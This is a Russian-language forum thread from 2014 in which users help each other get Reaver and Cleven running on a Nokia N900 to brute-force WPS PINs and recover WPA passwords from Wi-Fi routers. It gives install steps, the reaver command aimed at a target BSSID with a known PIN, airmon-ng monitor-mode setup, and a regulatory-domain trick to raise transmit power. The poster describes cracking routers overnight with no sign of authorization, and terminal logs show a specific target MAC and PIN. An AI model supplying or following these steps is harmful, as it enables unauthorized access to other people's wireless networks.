16 (12.05.2014 01:07:57 отредактировано Franc)

Re: Reaver (переборный криптоанализ для взл... WiFi)

hxka пишет:

deb — это пакет, ну. В нём лежат и reaver, и wash (это программа из пакета reaver).
Копировать ничего не нужно, Cleven находит бинарники сама.
Собственно, если ставить Cleven из диспетчера приложений, reaver подтягивается по зависимостям.

hxka, задача состоит в следующем. Требуется получить возможность лома WPA-WPS/WPA2-WPS. Здесь абсолютно не требуется мощьность компьютера (в отличии от перебора по словарю) и у меня с помощью адаптора Alfa 36h на дохлом десктопе с процем 720 мегагерц отлично ломает WPS. Но в этом случае нет мобильности, можно конечно с ноутбуком, но всеравно это не то. Поэтому хочу заставить N900 делать эту работу.
Исходные данные: стоит 52 кернел (кстати уже сейчас доступно 53 ядро, пока в тестовом режиме).
Поставил через терминал Cleven:

apt-get install -f cleven

запускаю прогу и при попытке конфигурации WLAN драйверов выскакивает желтое popup-сообщение:

WARNING: the system did not find a compatible kernel version for injection drives

The application might not works properly

Тогда согласно этому посту на ТМО стал курить WIKI.
Согласно этому

INSTRUCTIONS:
* To override the autodiscovery of the drivers location and use the default, create an empty file in /home/user/.cleven/skipKernelCheck
* To skip the kernel check in the startup, create an empty file in /home/user/.cleven/skipVersionCheck

создал два пустых файла. После этого сообщение о несовместимости с ядром перестало появляться, но при этом в Cleven в окне конфигурации драйверов перестал отображаться MAC-адрес и незагружаются драйвера.
Затем прочитав в WIKI следующее:

(atm the support is for versions 1.4 as of reaver-wps read also the release changelog for additional info). 


INSTRUCTIONS for adding reaver and wash support in the application: Copy reaver, reaven.db and wash binaries in /home/user/.reaver/ and re-start Cleven for the links to be created.

скачал reaver-wps.tar.gz но в нем нашел только бинарник reaven.db.
В общем куда теперь копать, чтобы заставить Cleven работать?

Поделиться

17

Re: Reaver (переборный криптоанализ для взл... WiFi)

Franc пишет:

WARNING: the system did not find a compatible kernel version for injection drives

А uname -r что говорит?

Про reaver инструкции в вики устаревшие. Ничего никуда копировать не надо, просто поставить reaver из extras.

A mammal should be able to hunt mice, hibernate, fly, chew its cud, echolocate, invent tools, lay eggs, burrow. Speciation is for insects.

18

Re: Reaver (переборный криптоанализ для взл... WiFi)

Franc пишет:

...........wash
...........reaver

На всякий случай пускай будет,
посмотрите, может, что годное есть.
Вдруг старые версии заработают у вас.

Там 9 разных файлов.
http://yadi.sk/d/6c3qbI9JPssZU

Walsh переименовали в Wash.

Мои северные соседи хотят сдвинуть земную ОСь.
Желаю им удачи, найду куда упереться - помогу толкать.

19

Re: Reaver (переборный криптоанализ для взл... WiFi)

hxka пишет:
Franc пишет:

WARNING: the system did not find a compatible kernel version for injection drives

А uname -r что говорит?

~ $ uname -r
2.6.28.10-cssu3

Поделиться

20 (12.05.2014 14:44:33 отредактировано hxka)

Re: Reaver (переборный криптоанализ для взл... WiFi)

Franc пишет:

2.6.28.10-cssu3

Ну так -cssu3 не -power52.
Установите kernel-power

apt-get install kernel-power-flasher

Или, если оно уже стояло

apt-get install --reinstall kernel-power-flasher kernel-power

(После установки ядра надо перезагрузиться)
Установите reaver

apt-get install reaver

Файлы skipKernelCheck и skipVersionCheck удалите, не нужно было их создавать вообще. И качать по ссылкам выше и копировать никуда тоже ничего не надо.

A mammal should be able to hunt mice, hibernate, fly, chew its cud, echolocate, invent tools, lay eggs, burrow. Speciation is for insects.

21

Re: Reaver (переборный криптоанализ для взл... WiFi)

hxka, спасибо, теперь все заработало! С меня еще 2 плюсика в ближайшие дни.

Еще вопрос:
1. Где reaver сохраняет процесс перебора PIN и конечный результат (100 процентный)
2. Возможно ли  после запуска драйверов в Cleven и сканирования сетей запустить в ручную (не через кнопку Reaver в Cleven) терминал и ввести команду:

iw reg set BO
twconfig wlan0 txpower 20

где 20 это условная мощьность передатчика WIFI телефона (на адаптор Alfa я такой командой ставлю 27).
3. Ну и вообще, что если запускать лом пинов не через кнопку Reaver, а вручную запустить терминал и прописать на запуск расширенную команду к примеру добавив -vv для расширенного отображения процесса лома.

Поделиться

22

Re: Reaver (переборный криптоанализ для взл... WiFi)

1. В /home/user/.reaver/reaver.db, наверное.
2. Не знаю?
3. Можно отредактировать команду в /opt/cleven/clevenHelper.sh

A mammal should be able to hunt mice, hibernate, fly, chew its cud, echolocate, invent tools, lay eggs, burrow. Speciation is for insects.

23

Re: Reaver (переборный криптоанализ для взл... WiFi)

hxka пишет:

2. Не знаю?

Первой командой устанавливаю регион Боливия
Второй командой повышаю мощьность Alfa. В результате видит гораздо больше сетей при сканировании чем ноутбук или планшет. Как правило в два и более раз. Правда при значении 27 греетса. При больших значениях уже может сгореть.
Вот тоже хотел проделать и на N900

Поделиться

24

Re: Reaver (переборный криптоанализ для взл... WiFi)

В общем проблемы продолжаются! sad
Короче Cleaven (вернее reaver) работает четко, но вот облом, после того как он находит WPS PIN и выдает WPA PSK окно терминала практически сразу закрывается. При повторном запуске он уже выдает только PIN без ключа PSK.
Как решить эту траблу, а то представте, поставил вечером ломать роутер, утром проверил, он сломан, но окно терминала закрыто и при повторном запуске выдает уже только PIN.

PS: В  home/user/.reaver/reaver.db тоже нет никаких данных о взломанном роуторе.

Поделиться

25

Re: Reaver (переборный криптоанализ для взл... WiFi)

Franc пишет:

В общем проблемы продолжаются! sad
Короче Cleaven (вернее reaver) работает четко, но вот облом, после того как он находит WPS PIN и выдает WPA PSK окно терминала практически сразу закрывается. При повторном запуске он уже выдает только PIN без ключа PSK.
Как решить эту траблу, а то представте, поставил вечером ломать роутер, утром проверил, он сломан, но окно терминала закрыто и при повторном запуске выдает уже только PIN.

PS: В  home/user/.reaver/reaver.db тоже нет никаких данных о взломанном роуторе.

а если через консоль по этому пину пароль запросить

Поделиться

26

Re: Reaver (переборный криптоанализ для взл... WiFi)

mcqueen9458 пишет:

а если через консоль по этому пину пароль запросить

Ну а как команду прописать в терминале?

Поделиться

27 (13.05.2014 23:02:05 отредактировано mcqueen9458)

Re: Reaver (переборный криптоанализ для взл... WiFi)

Franc пишет:
mcqueen9458 пишет:

а если через консоль по этому пину пароль запросить

Ну а как команду прописать в терминале?

в cleven включаем режим монитора, драйвера для пакетной инъекции и идем в терминал
sudo gainroot
reaver -i mon0 -c X (канал атакуемой сети, обычно 1-11) -b XX:XX:XX:XX:XX:XX (mac адрес атакуемой сети) --pin=XXXXXXXX (полученный pin) -vv

28 (14.05.2014 00:05:35 отредактировано Franc)

Re: Reaver (переборный криптоанализ для взл... WiFi)

mcqueen9458 пишет:

в cleven включаем режим монитора, драйвера для пакетной инъекции и идем в терминал
sudo gainroot
reaver -i mon0 -c X (канал атакуемой сети, обычно 1-11) -b XX:XX:XX:XX:XX:XX (mac адрес атакуемой сети) --pin=XXXXXXXX (полученный pin) -vv

Не канает. Терминал выдает:

Failed to retrieve a MAC address for interface 'mon0'!

KiRiK, пока пробовал команду в терминале, ты уже перенес все посты в другую тему. Потому перенеси и этот.

Поделиться

29

Re: Reaver (переборный криптоанализ для взл... WiFi)

Franc пишет:
mcqueen9458 пишет:

в cleven включаем режим монитора, драйвера для пакетной инъекции и идем в терминал
sudo gainroot
reaver -i mon0 -c X (канал атакуемой сети, обычно 1-11) -b XX:XX:XX:XX:XX:XX (mac адрес атакуемой сети) --pin=XXXXXXXX (полученный pin) -vv

Не канает. Терминал выдает:

Failed to retrieve a MAC address for interface 'mon0'!

тогда в терминале
sudo gainroot
airmon-ng start wlan0
и дальше reaver...

Поделиться

30

Re: Reaver (переборный криптоанализ для взл... WiFi)

BusyBox v1.10.2 (Debian 3:1.10.2.legal-1osso31+0cssu0) built-in shell (ash)
Enter 'help' for a list of built-in commands.

~ $ sudo gainroot
Root shell enabled


BusyBox v1.10.2 (Debian 3:1.10.2.legal-1osso31+0cssu0) built-in shell (ash)
Enter 'help' for a list of built-in commands.

/home/user # reaver -i mon0 -c 1 -b 64:70:02:af:ea:60 --pin=50585670 -vv

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Switching mon0 to channel 1
[-] Failed to retrieve a MAC address for interface 'mon0'!
/home/user # reaver -i mon0 -c 1 -b 64:70:02:AF:EA:60 --pin=50585670 -vv

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Switching mon0 to channel 1
[-] Failed to retrieve a MAC address for interface 'mon0'!
/home/user # airmon-ng start wlan0 reaver -i mon0 -c 1 -b 64:70:02:AF:EA:60 --pin=50585670 -vv


Interface    Chipset        Driver

wlan0        TI WL1251    wl12xx - [phy0]sleep: invalid number '1s'
sh: reaver: bad number

                (monitor mode enabled on mon0)

/home/user #

Поделиться